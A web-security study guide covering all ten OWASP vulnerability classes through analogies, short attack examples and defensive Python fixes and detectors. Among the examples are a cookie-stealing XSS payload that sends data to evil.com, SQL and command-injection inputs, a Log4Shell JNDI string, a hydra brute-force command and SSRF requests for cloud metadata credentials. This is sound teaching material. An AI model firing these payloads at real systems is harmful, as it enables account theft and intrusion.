// all 10 vulnerabilities · analogies · attack examples · interview q's
Imagine a hotel where every room uses the same key. Room 101 could open Room 505 just by changing the room number on the keycard. The front desk (server) trusts what the keycard says without verifying if that guest is actually allowed in that room.
# You're logged in as user 42. Your invoice URL is:
GET /api/invoices/1042
# You change the ID — no authorization check on server:
GET /api/invoices/1043 → 200 OK — you just read someone else's invoice
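An object-level authorization check that closes the invoice IDOR above, as an added Python example (not code from the original page); the invoice table, the user ids and the admin set are constructed stand-ins:

```python
from dataclasses import dataclass
from typing import Dict, Optional, Set

@dataclass
class Invoice:
    id: int
    owner_id: int
    total: float

# Constructed data: invoice 1042 belongs to user 42, 1043 to user 43
INVOICES: Dict[int, Invoice] = {
    1042: Invoice(1042, 42, 120.00),
    1043: Invoice(1043, 43, 75.50),
}
ADMINS: Set[int] = {1}   # constructed: user 1 holds the admin role

def get_invoice_vulnerable(current_user: int, invoice_id: int) -> Optional[Invoice]:
    """IDOR: the record is looked up by id alone; nobody asks who is asking."""
    return INVOICES.get(invoice_id)

def get_invoice(current_user: int, invoice_id: int) -> Optional[Invoice]:
    """Deny by default: return the record only if the caller owns it or is an admin.
    The check runs server-side on every request, never in the client."""
    inv = INVOICES.get(invoice_id)
    if inv is None:
        return None
    if inv.owner_id != current_user and current_user not in ADMINS:
        # Same 'not found' result for 'missing' and 'not yours', so that
        # probing ids does not reveal which invoices exist
        return None
    return inv

def delete_user(current_user: int, target_user: int) -> bool:
    """Vertical check: the admin role is enforced here, not by hiding the admin link."""
    if current_user not in ADMINS:
        return False
    # ... the deletion itself would happen here ...
    return True
```

The same shape applies to every endpoint that takes an object id: look the record up, then compare its owner (or the caller's role) against the authenticated identity before returning it.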
# Horizontal priv esc: same role, different user
# Vertical priv esc: user accesses admin endpoint
GET /admin/deleteUser?id=99 → Works if auth not enforced server-side

Sending your credit card number on a postcard instead of a sealed envelope. Anyone who handles that postcard — the mailman, sorting facility — can read it. HTTPS is the sealed, tamper-evident envelope.
# Passwords stored with MD5 (broken)
DB: user_password = "5f4dcc3b5aa765d61d8327deb882cf99"
→ Instantly cracked: "password" (rainbow tables)
# HTTP site transmitting session token
GET http://bank.com/dashboard
Cookie: session=abc123
→ Sniffed on public WiFi via Wireshark / mitmproxy
# Weak TLS: site supports SSLv3 / TLS 1.0
→ POODLE / BEAST attack possible

Imagine a secretary who types up whatever you say into official memos. You say: "Write a memo saying: fire John. Also, fire the entire finance department." The secretary, blindly following instructions, sends both memos. The app is the secretary — it needs to check if the input is a legitimate instruction, not just follow it blindly.
# Vulnerable SQL query
SELECT * FROM users WHERE username='$input' AND password='$pass'
# Attacker enters: ' OR '1'='1
SELECT * FROM users WHERE username='' OR '1'='1' AND password=''
→ Always true. Bypasses login entirely.
# Command injection via ping field
Input: 8.8.8.8; cat /etc/passwd
ping 8.8.8.8; cat /etc/passwd
→ Server executes both commands
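The three injection cases in this section side by side with their fixes, as an added Python example (not code from the original page): the string-built login query next to a parameterised one, the ping field validated as an IP address and passed as an argv list, and output encoding for the comment field. The in-memory SQLite table and its one user are constructed:

```python
import html
import ipaddress
import sqlite3
from typing import List, Optional

def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table standing in for the app's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct-horse')")
    conn.commit()
    return conn

def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """String-built query: user input is pasted into the SQL text and becomes syntax."""
    q = f"SELECT * FROM users WHERE username='{username}' AND password='{password}'"
    return conn.execute(q).fetchone() is not None

def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterised query: values travel separately from the SQL text, so a quote
    in the input is data, never syntax. (Passwords would also be hashed; omitted here.)"""
    q = "SELECT * FROM users WHERE username=? AND password=?"
    return conn.execute(q, (username, password)).fetchone() is not None

def ping_argv(host: str) -> Optional[List[str]]:
    """Command injection fix: validate the input against the shape it must have
    (an IP address) and build an argv list. Run it with subprocess.run(argv) and
    shell=False so no shell ever interprets ';' or '|'. Returns None on bad input."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return None
    return ["ping", "-c", "1", str(ip)]

def render_comment(comment: str) -> str:
    """Stored XSS fix: encode on output so the browser displays the text
    instead of executing it."""
    return f"<p>{html.escape(comment, quote=True)}</p>"
```

The common thread is that data and instructions are kept apart by the interface (bound parameters, argv arrays, encoded output) rather than by trying to filter "bad characters" out of the input.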
# Stored XSS in comment field
<script>document.location='https://evil.com/steal?c='+document.cookie</script>
→ Every visitor's session cookie gets stolen

A bank designs a vault where you can make unlimited "test withdrawals" that don't count until you hit confirm — but never implemented confirmation. The flaw isn't a bug in the code; it's that nobody asked "what if someone spams the test button?" during design phase.
# Business logic flaw: negative quantities
POST /cart
{ "item": "laptop", "qty": -1, "price": 999 }
→ App refunds $999 to your account (no validation on negative qty)
# Password reset with no rate limit or account lockout
→ Attacker brute-forces 6-digit OTP (1,000,000 combos)
→ Design flaw: should expire after 5 attempts
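The two design rules above written down as code, as an added Python example (not from the original page): a cart that prices items server-side and rejects quantities outside the range the business intended, and an OTP challenge that dies after five wrong guesses, five minutes, or one successful use. The catalogue, prices and limits are constructed:

```python
import hmac
from dataclasses import dataclass
from typing import Dict, Tuple

# Constructed catalogue: prices are looked up server-side, never taken from the request
CATALOG: Dict[str, float] = {"laptop": 999.00, "mouse": 25.00}
MAX_QTY = 100

def add_to_cart(cart: Dict[str, int], item: str, qty) -> Tuple[bool, float]:
    """Enforce the business rule 'a customer buys 1..MAX_QTY of a listed item'
    before any money moves. Returns (accepted, cart total)."""
    def total() -> float:
        return sum(CATALOG[i] * q for i, q in cart.items())
    if item not in CATALOG:
        return False, total()
    if type(qty) is not int or not 1 <= qty <= MAX_QTY:   # rejects -1, 0, 1.5, "5", True
        return False, total()
    cart[item] = cart.get(item, 0) + qty
    return True, total()

MAX_OTP_ATTEMPTS = 5
OTP_TTL_SECONDS = 300

@dataclass
class OtpChallenge:
    code: str            # 6 digits, generated with a CSPRNG elsewhere
    issued_at: float
    attempts: int = 0
    dead: bool = False   # locked, expired or already used

def verify_otp(ch: OtpChallenge, submitted: str, now: float) -> str:
    """Returns 'ok', 'wrong', 'locked' or 'expired'. A challenge dies after five
    wrong guesses, after five minutes, or after one success, so a million-combination
    code can be tried at most five times."""
    if ch.dead:
        return "locked"
    if now - ch.issued_at > OTP_TTL_SECONDS:
        ch.dead = True
        return "expired"
    ch.attempts += 1
    if hmac.compare_digest(ch.code.encode(), submitted.encode()):
        ch.dead = True        # single use
        return "ok"
    if ch.attempts >= MAX_OTP_ATTEMPTS:
        ch.dead = True
        return "locked"
    return "wrong"
```

Neither function is hard to write; the design failure is that nobody specified these limits, so nobody implemented them.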
# Credential stuffing because no MFA was designed in
→ 10M leaked username/passwords → automated login attempts

Moving into a new house and never changing the locks that came with it. The builder, every contractor, and the previous owner all have a copy. "It worked out of the box" doesn't mean it's secure — default = known to everyone.
# Default credentials (very common)
admin:admin, admin:password, root:root
→ Jenkins, Tomcat, routers exposed to internet
# AWS S3 bucket public read (Capital One breach 2019)
curl https://s3.amazonaws.com/company-internal-docs/
→ 100M customer records exposed
# Stack trace leaking in error response
500 Internal Server Error:
NullPointerException at DatabaseHelper.java:42
Connection string: jdbc:mysql://prod-db:3306/users
→ Attacker now knows DB type, host, and port
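How to keep the stack trace above out of the response, plus a boot-time refusal to run with the defaults listed earlier, as an added Python example (not from the original page). The config keys (`debug`, `directory_listing`, `admin_user`, `admin_password`) and the default-credential list are constructed:

```python
import logging
import traceback
import uuid
from typing import Dict, List, Tuple

log = logging.getLogger("app")

def error_response(exc: BaseException, debug: bool = False) -> Tuple[int, Dict[str, str]]:
    """Log the full trace server-side under a reference id and return only the id
    to the client. debug=True reproduces the misconfiguration: the trace, with
    whatever it contains (hosts, connection strings), goes out in the response."""
    ref = uuid.uuid4().hex[:12]
    trace = "".join(traceback.format_exception(type(exc), exc, exc.__traceback__))
    log.error("ref=%s unhandled exception\n%s", ref, trace)
    body = {"error": "internal server error", "ref": ref}
    if debug:
        body["trace"] = trace
    return 500, body

# Constructed list of factory credentials this deployment refuses to run with
KNOWN_DEFAULTS = {("admin", "admin"), ("admin", "password"), ("root", "root")}

def startup_findings(config: dict) -> List[str]:
    """Refuse-to-start checks for the misconfigurations listed above;
    an empty list means the service may boot."""
    findings = []
    if config.get("debug"):
        findings.append("debug mode enabled: stack traces will reach clients")
    if config.get("directory_listing"):
        findings.append("directory listing enabled")
    if (config.get("admin_user"), config.get("admin_password")) in KNOWN_DEFAULTS:
        findings.append("admin account uses a factory default credential")
    return findings
```

The reference id is what support staff use to find the real trace in the logs; the client learns nothing about the database, the host or the code path.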
# Directory listing enabled
GET /backup/ → shows: db_backup_2024.sql, config.env

Your car has a recalled brake system — the manufacturer sent a fix months ago, but you never applied it. You're not driving an "unpatched car" deliberately, you just never checked. The vulnerability is public knowledge, the exploit is a manual, and you're the one at risk.
# Log4Shell (CVE-2021-44228) — Dec 2021
# Log4j logs user-agent string — attacker sends:
User-Agent: ${jndi:ldap://attacker.com/exploit}
→ Server fetches and executes attacker's Java class
→ RCE on millions of servers in 72 hours
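Detection logic for the Log4Shell probe above, run over access-log lines, as an added Python example (not from the original page). The log lines are constructed; the `attacker.example` host is a placeholder:

```python
import re
from typing import List

# Constructed access-log lines (combined format, User-Agent last); the final two
# carry a JNDI lookup string in the User-Agent header
ACCESS_LOG = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:14:02:12 +0000] "GET /login HTTP/1.1" 200 "curl/7.79.1"',
    '203.0.113.9 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '203.0.113.9 - - [10/Dec/2021:14:02:14 +0000] "GET /api HTTP/1.1" 200 "${JNDI:rmi://attacker.example/b}"',
]

# Log4j lower-cases the lookup prefix, so match case-insensitively; tolerate spaces
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def is_jndi_probe(text: str) -> bool:
    return JNDI_LOOKUP.search(text) is not None

def scan_log(lines: List[str]) -> List[str]:
    """Return the client IP of every line carrying a JNDI lookup anywhere in the
    line (User-Agent, path, referer): any logged field is a sink for Log4j."""
    return [line.split(" ", 1)[0] for line in lines if is_jndi_probe(line)]
```

A hit in the log means a probe arrived, not that it succeeded; the follow-up is to check whether the host runs an affected Log4j version and whether it made outbound LDAP or RMI connections at that time. Detection is a stopgap while the patch is rolled out, not a substitute for it.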
# Checking for outdated packages
npm audit # Node.js
pip-audit # Python
nmap --script vuln # Service version + CVE check
# EternalBlue (MS17-010) — WannaCry
→ Unpatched Windows SMB → ransomware epidemic

A nightclub that checks ID but accepts a Post-It note with "YES IM 21" written on it. Or one that lets you back in with the same wristband after leaving — even if you lent it to a friend. The bouncer (authentication) trusted the wrong signals.
# Credential stuffing with leaked passwords
hydra -L users.txt -P rockyou.txt https://target.com/login
→ 0.5% success rate × 1M accounts = 5,000 compromised
# Session token never expires or rotates after login
Cookie: session=abc123
→ Steal the token → replay it for weeks
# Predictable session token
session_20240101_user42
→ Attacker guesses other users' tokens
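A session store that fixes the two token problems above (never expiring, predictable), as an added Python example (not from the original page): tokens come from the OS CSPRNG, a new token is issued on every login, and both an idle and an absolute lifetime are enforced. The timeout values are constructed:

```python
import secrets
import time
from dataclasses import dataclass
from typing import Dict, Optional

IDLE_TIMEOUT = 30 * 60        # seconds without a request
ABSOLUTE_TIMEOUT = 8 * 3600   # seconds since login, regardless of activity

def predictable_token(user_id: int, now: float) -> str:
    """The weak pattern above: date + user id. Anyone can derive another user's token."""
    return f"session_{time.strftime('%Y%m%d', time.gmtime(now))}_user{user_id}"

@dataclass
class Session:
    user_id: int
    created_at: float
    last_seen: float

class SessionStore:
    """Server-side sessions keyed by a 256-bit random token."""

    def __init__(self) -> None:
        self._sessions: Dict[str, Session] = {}

    def login(self, user_id: int, now: float, presented_token: Optional[str] = None) -> str:
        """Issue a fresh token on every login and drop whatever token was presented
        beforehand, so a token fixed or captured pre-auth is worthless afterwards."""
        if presented_token is not None:
            self._sessions.pop(presented_token, None)
        token = secrets.token_urlsafe(32)   # 32 random bytes from the OS CSPRNG
        self._sessions[token] = Session(user_id, now, now)
        return token

    def resolve(self, token: str, now: float) -> Optional[int]:
        """Map a token to a user id, enforcing idle and absolute expiry."""
        s = self._sessions.get(token)
        if s is None:
            return None
        if now - s.last_seen > IDLE_TIMEOUT or now - s.created_at > ABSOLUTE_TIMEOUT:
            del self._sessions[token]   # a replayed token stops working after expiry
            return None
        s.last_seen = now
        return s.user_id

    def logout(self, token: str) -> None:
        self._sessions.pop(token, None)
```

Because the mapping lives server-side, a stolen token has a bounded lifetime and can be revoked at once by deleting the entry.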
# No rate limiting on password reset OTP
→ Brute force 6-digit code in minutes

A restaurant that receives sealed ingredient boxes from a supplier — but never checks if the seal has been tampered with. The attacker intercepts the delivery, replaces the chicken with something toxic, reseals the box, and the kitchen blindly cooks it. The food (data/code) was never verified to be what it claimed.
# Insecure deserialization (Java)
# App deserializes base64 cookie without validation
Cookie: user=rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==
→ Attacker crafts malicious serialized object → RCE
→ Tool: ysoserial.jar
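Three integrity checks for the cases in this section, as an added Python example (not from the original page): recognising a raw Java object stream in a client-supplied cookie, replacing native deserialization with a JSON cookie whose HMAC tag is verified before parsing, and pinning a downloaded artifact to a digest obtained out of band. The secret key and sample values are constructed:

```python
import base64
import binascii
import hashlib
import hmac
import json
from typing import Optional

JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"   # first bytes of every Java serialization stream

def is_java_serialized(b64_value: str) -> bool:
    """Detection: does a cookie or parameter carry a raw Java object stream?
    A value like that arriving from a client should never reach ObjectInputStream."""
    try:
        raw = base64.b64decode(b64_value, validate=True)
    except (binascii.Error, ValueError):
        return False
    return raw.startswith(JAVA_SERIAL_MAGIC)

SECRET_KEY = b"constructed-demo-key-replace-me"   # constructed; load from a secret store

def sign_cookie(data: dict) -> str:
    """Serialise plain data as JSON (no code, no class names) and append an
    HMAC-SHA256 tag computed with a server-only key."""
    payload = base64.urlsafe_b64encode(json.dumps(data, separators=(",", ":")).encode()).decode()
    tag = hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{tag}"

def load_cookie(cookie: str) -> Optional[dict]:
    """Verify the tag *before* parsing anything; None on any tampering."""
    if "." not in cookie:
        return None
    payload, tag = cookie.rsplit(".", 1)
    expected = hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None
    return json.loads(base64.urlsafe_b64decode(payload))

def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

def verify_artifact(content: bytes, expected_sha256: str) -> bool:
    """Supply-chain check: pin an update or package to a digest obtained out of band
    (lockfile, vendor advisory) before installing or executing it."""
    return hmac.compare_digest(sha256_hex(content), expected_sha256)
```

The cookie format carries data only, so even a forged payload cannot name a class to instantiate; and because the tag is checked first, a forged payload is never parsed at all. For a signed vendor update the same idea applies with the vendor's signature in place of the HMAC.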
# SolarWinds (2020) supply chain attack
→ Attackers compromised the BUILD server
→ Malicious code injected into legitimate signed update
→ 18,000+ orgs downloaded the backdoored update
# npm package hijack
→ Attacker publishes typosquatted "lodahs" (not "lodash")
→ Developer typos → malicious code runs in CI/CD

A bank with no security cameras, no alarm triggers, no incident log. A thief breaks in at 2am, drills the vault slowly for 6 hours, leaves. Nobody knows until a teller notices cash is missing 3 weeks later. The crime happened — the failure is that nobody was watching, and the evidence was never recorded.
# What an attacker loves: no logs
→ 50,000 failed login attempts → no alert triggered
→ Attacker pivots from web app to internal network
→ Exfiltrates 10GB over 3 weeks → no anomaly detected
# Equifax breach (2017)
→ Attackers active for 78 days undetected
→ 143M records exfiltrated
→ SSL inspection disabled → encrypted exfiltration missed
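The detection that was missing in the "50,000 failed logins, no alert" case above, as an added Python example (not from the original page): a sliding-window count of failed logins per source IP that raises one alert once a threshold is crossed. The auth-log lines, threshold and window are constructed:

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timezone
from typing import Deque, Dict, List, Optional, Set

# Constructed auth-log lines: six failures from one address inside a few seconds,
# plus ordinary noise from another
AUTH_LOG = [
    "2024-01-15 02:31:40 [INFO] Login ok user:bob ip:10.0.0.8",
    "2024-01-15 02:31:44 [WARN] Failed login user:admin ip:45.33.32.156",
    "2024-01-15 02:31:45 [WARN] Failed login user:admin ip:45.33.32.156",
    "2024-01-15 02:31:45 [WARN] Failed login user:admin ip:45.33.32.156",
    "2024-01-15 02:31:46 [WARN] Failed login user:root ip:45.33.32.156",
    "2024-01-15 02:31:47 [WARN] Failed login user:bob ip:10.0.0.8",
    "2024-01-15 02:31:47 [WARN] Failed login user:admin ip:45.33.32.156",
    "2024-01-15 02:31:48 [WARN] Failed login user:admin ip:45.33.32.156",
]

LINE_RE = re.compile(r"^(\S+ \S+) \[\w+\] (Failed login|Login ok) user:(\S+) ip:(\S+)$")

class BruteForceDetector:
    """Sliding-window count of failed logins per source IP; alerts once per IP."""

    def __init__(self, threshold: int = 5, window_s: float = 60.0) -> None:
        self.threshold, self.window_s = threshold, window_s
        self._fails: Dict[str, Deque[float]] = defaultdict(deque)
        self.blocked: Set[str] = set()

    def observe(self, ts: float, failed: bool, ip: str) -> Optional[str]:
        if not failed:
            return None
        q = self._fails[ip]
        q.append(ts)
        while q and ts - q[0] > self.window_s:   # forget failures older than the window
            q.popleft()
        if len(q) >= self.threshold and ip not in self.blocked:
            self.blocked.add(ip)
            return f"[ALERT] Brute force detected ip:{ip} ({len(q)} failures in {self.window_s:.0f}s) - blocking IP"
        return None

def replay(lines: List[str], det: Optional[BruteForceDetector] = None) -> List[str]:
    """Feed log lines through the detector; returns the alerts raised."""
    det = det or BruteForceDetector()
    alerts = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc).timestamp()
        alert = det.observe(ts, m.group(2) == "Failed login", m.group(4))
        if alert:
            alerts.append(alert)
    return alerts
```

The same window-and-threshold shape covers the other two signs listed above (requests from the web tier to internal hosts it never talks to, outbound volume far above a baseline); what changes is the event being counted and the key it is grouped by.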
# What good logs look like
2024-01-15 02:31:44 [WARN] Failed login user:admin ip:45.33.32.156
2024-01-15 02:31:45 [WARN] Failed login user:admin ip:45.33.32.156
2024-01-15 02:31:45 [ALERT] Brute force detected — blocking IP

You can't enter a restricted government building, but you have a friend who works there. You hand your friend a letter and say "can you go ask the records room for file #4521 and bring it back to me?" Your friend (the server) fetches it on your behalf, bypassing all the security checks you would have faced at the front door.
# App accepts a URL and fetches it server-side
POST /api/preview
{ "url": "https://legitimate-site.com" }
# Attacker points it to cloud metadata API
{ "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/" }
→ Returns AWS IAM credentials — full cloud account takeover
# Internal service enumeration
{ "url": "http://internal-db:5432" } → Port scan internal network
{ "url": "http://redis:6379" } → Access internal Redis cache
# Capital One 2019: WAF misconfigured + SSRF
→ 100M+ customer records stolen via metadata API